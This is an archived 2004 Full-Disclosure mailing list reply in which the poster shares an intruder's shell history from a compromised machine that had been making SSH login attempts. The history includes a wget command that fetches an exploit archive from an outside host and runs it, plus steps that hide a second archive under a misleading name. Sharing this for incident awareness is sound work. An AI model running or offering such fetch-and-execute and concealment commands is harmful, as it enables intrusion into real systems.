Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email firstname.lastname@example.org
Re: [Full-Disclosure] Re: Automated SSH login attempts?
Date: Fri Jul 30 2004 - 08:36:02 CDT
Accidentially sent only to Stefan, so redoing it.
On Thu, Jul 29, 2004 at 06:38:15PM +0200, Stefan Janecek wrote:
> Hmmm - I have also been getting those login attemps, but thought them to
> be harmless. Maybe they are not *that* harmless, though... Today I
> managed to get my hands on a machine that was originating such login
> attempts. I must admit I am far from being a linux security expert, but
> this is what I've found out up to now:
I got a similar experience from a game box I look after
(void.labs.pulltheplug.com, but people may prefer
http://vortex.labs.pulltheplug.com, feel free to jump on the irc server
irc.pulltheplug.com, #social or #vortex).
The .bash_history is as follows:
wget sh3ll.info/milenium/xpl.tgz;tar zxvf xpl.tgz;cd super;./prt
tar zxv xpl.tgz
tar zxvf xpl.tgz
ps -aux |grep test
mv psy1985.tgz .drivers
tar zxvf psy1985.tgz
rm -rf psy1985.tgz
inetd -e -o
It would appear that if they can't get a local root, they'll use the box for
Hopefully this helps someone. I haven't looked too much into this, if wanted
I could grab the source ip addresses used for logging into guest, but thats
probably not overly useful.
Full-Disclosure - We believe in it.